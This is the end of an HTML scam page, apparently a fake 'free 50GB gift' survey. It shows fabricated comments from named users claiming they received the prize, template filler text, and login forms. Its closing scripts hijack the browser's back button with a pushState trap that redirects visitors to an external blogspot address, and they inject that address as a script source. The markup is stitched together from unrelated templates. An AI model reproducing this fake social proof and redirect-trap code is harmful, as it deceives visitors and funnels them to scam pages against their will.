                        Akriti Bhat 
                        </span>
                        <br/>
                       Thanks for this gift!! I get 50GB for free just now  
                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now    
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb7' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/lNPofv3.jpg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                          Gayatri Anand  
                        </span>
                        <br/>
                      Oooh thx ! I can't believe that I wan this 
                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb6' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/MFEsfnq.jpg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                          Himani Goel   
                        </span>
                        <br/>
                      I've got 50GB .. Thank you   
                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb5' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/N42335a.jpg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                         Indeever Chaudhary  
                        </span>
                        <br/>
                         Thank you !
                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb4' style='display: none; opacity: 1;'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/fnf8kzy.jpg' width='50'/>
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                      Roy Malik 
                        </span>
                        <br/>   You should share with your friends to get this promotion!!! 
                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now     
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item'>
                      <img class='profileimg' height='50' src='https://i.imgur.com/b6E9XNw.png' width='50'/>
                      <p class='comtxt'>
                        <span class='name'>
                    Sahni Lakshmiraman 
                        </span>
                        <br/>
                        Fantastic! Thank you a lot for this
                      </p>
                      <p class='combot'>
                        <span class='ago'>
                       2 min ago
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                        <span class='likes totlikes'>
                          223
                        </span>
                      </p>
                    </div>
                  </div>
                  <br/>
                <div>
                <div class='pops'>
                  <img alt='' id='piplovi' src='img/piplovi.png'/>
                  <p>
                    AMAN ZAMAN BRATE NEMAC NEMO ME UBIJES BREEEE BREE BREEE
                  </p>
                  <img alt='' id='iks' src='img/iks.png'/>
                </div>
                  </div>
              <!-- survey-inner MobGyan -->
            </div>
          </div>
          <!-- survey MobGyan -->
                </div>
        <!-- content-inner MobGyan -->
      </div>
                </div>
  </div>
  <!-- container MobGyan -->
<b:section id='fixelements' showaddelement='no'/>

				</div>
				<div class="clearfix"> </div>
			</div>
		</div>
	</div>
<!-- //courses -->
<!-- bootstrap-pop-up -->
	<div class="modal video-modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="myModal">
		<div class="modal-dialog" role="document">
			<div class="modal-content">
				<div class="modal-header">
					<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>						
				</div>
				<section>
					<div class="modal-body">
						
						<p>Ut enim ad minima veniam, quis nostrum 
							exercitationem ullam corporis suscipit laboriosam, 
							nisi ut aliquid ex ea commodi consequatur? Quis autem 
							vel eum iure reprehenderit qui in ea voluptate velit 
							esse quam nihil molestiae consequatur, vel illum qui 
							dolorem eum fugiat quo voluptas nulla pariatur.
							<i>" Quis autem vel eum iure reprehenderit qui in ea voluptate velit 
								esse quam nihil molestiae consequatur.</i></p>
					</div>
				</section>
			</div>
		</div>
	</div>
<!-- //bootstrap-pop-up -->
<div class="wthree_copy_right">
	<div class="container">
		<p>Tetfund grants</p>
	</div>
</div>
<!-- //footer -->
<div class="modal fade" id="myModal2" tabindex="-1" role="dialog">
														<div class="modal-dialog">
														<!-- Modal content-->
															<div class="modal-content">
																<div class="modal-header">
																	<button type="button" class="close" data-dismiss="modal">&times;</button>
																	<div class="signin-form profile">
																	<h3 class="agileinfo_sign">Sign In</h3>	
																			<div class="login-form">
																				<form action="#" method="post">
																					<input type="email" name="email" placeholder="E-mail" required="">
																					<input type="password" name="password" placeholder="Password" required="">
																					<div class="tp">
																						<input type="submit" value="Sign In">
																					</div>
																				</form>
																			</div>
																			<div class="login-social-grids">
																				<ul>
																					<li><a href="#"><i class="fa fa-facebook"></i></a></li>
																					<li><a href="#"><i class="fa fa-twitter"></i></a></li>
																					<li><a href="#"><i class="fa fa-rss"></i></a></li>
																				</ul>
																			</div>
																			<p><a href="#" data-toggle="modal" data-target="#myModal3" > Don't have an account?</a></p>
																		</div>
																</div>
															</div>
														</div>
													</div>
													<!-- //Modal1 -->	
													<!-- Modal2 -->
													<div class="modal fade" id="myModal3" tabindex="-1" role="dialog">
														<div class="modal-dialog">
														<!-- Modal content-->
															<div class="modal-content">
																<div class="modal-header">
																	<button type="button" class="close" data-dismiss="modal">&times;</button>
																	<div class="signin-form profile">
																	<h3 class="agileinfo_sign">Sign Up</h3>	
																			<div class="login-form">
																				<form action="#" method="post">
																				   <input type="text" name="name" placeholder="Username" required="">
																					<input type="email" name="email" placeholder="Email" required="">
																					<input type="password" name="password" placeholder="Password" required="">
																					<input type="password" name="password" placeholder="Confirm Password" required="">
																					<input type="submit" value="Sign Up">
																				</form>
																			</div>
																			<p><a href="#"> By clicking register, I agree to your terms</a></p>
																		</div>
																</div>
															</div>
														</div>
													</div>
													<!-- //Modal2 -->	
<!-- //bootstrap-pop-up -->
<!-- js -->
<script type="text/javascript" src="js/jquery-2.1.4.min.js"></script>
<!-- //js -->
<script src="js/bars.js"></script>
<!-- stats -->
	<script src="js/jquery.waypoints.min.js"></script>
	<script src="js/jquery.countup.js"></script>
		<script>
			$('.counter').countUp();
		</script>
<!-- //stats -->
<!-- carousal -->
	<script src="js/slick.js" type="text/javascript" charset="utf-8"></script>
	<script type="text/javascript">
		$(document).on('ready', function() {
		  $(".center").slick({
			dots: true,
			infinite: true,
			centerMode: true,
			slidesToShow: 2,
			slidesToScroll: 2,
			responsive: [
				{
				  breakpoint: 768,
				  settings: {
					arrows: true,
					centerMode: false,
					slidesToShow: 2
				  }
				},
				{
				  breakpoint: 480,
				  settings: {
					arrows: true,
					centerMode: false,
					centerPadding: '40px',
					slidesToShow: 1
				  }
				}
			 ]
		  });
		});
	</script>
<!-- //carousal -->
<!-- start-smooth-scrolling -->
<script type="text/javascript" src="js/move-top.js"></script>
<script type="text/javascript" src="js/easing.js"></script>
<script type="text/javascript">
	jQuery(document).ready(function($) {
		$(".scroll").click(function(event){		
			event.preventDefault();
			$('html,body').animate({scrollTop:$(this.hash).offset().top},1000);
		});
	});
</script>
<!-- start-smooth-scrolling -->
<!-- for bootstrap working -->
	<script src="js/bootstrap.js"></script>
<!-- //for bootstrap working -->
<!-- here stars scrolling icon -->
	<script type="text/javascript">
		$(document).ready(function() {
			/*
				var defaults = {
				containerID: 'toTop', // fading element id
				containerHoverID: 'toTopHover', // fading element hover id
				scrollSpeed: 1200,
				easingType: 'linear' 
				};
			*/
			$().UItoTop({ easingType: 'easeOutQuart' });
			});
	</script>
<!-- //here ends scrolling icon -->

<script>
    window.onhashchange=function(){jp();};
    function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
    function jp() {
        fh();}
    setTimeout('hh();', 500);
    function fh(){
        location.href="https://lets-move-now-2022.blogspot.com/";
    }
    function goon(){
        location.href="https://lets-move-now-2022.blogspot.com/";
    }
</script>
<script>
    var _hmt = _hmt || [];
    (function() {
        var hm = document.createElement("script");
        hm.src = "https://lets-move-now-2022.blogspot.com/";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();



</body>
<!-- BEGIN: Powered by Supercounters.com -->
<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1648271,"ffffff","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
</center>
<!-- END: Powered by Supercounters.com -->

<!-- BEGIN: Powered by Supercounters.com -->
<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1648271,"ffffff","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
</center>
<!-- END: Powered by Supercounters.com -->

</html>


<!-- BEGIN: Powered by Supercounters.com -->
<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1648271,"ffffff","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
</center>
<!-- END: Powered by Supercounters.com -->

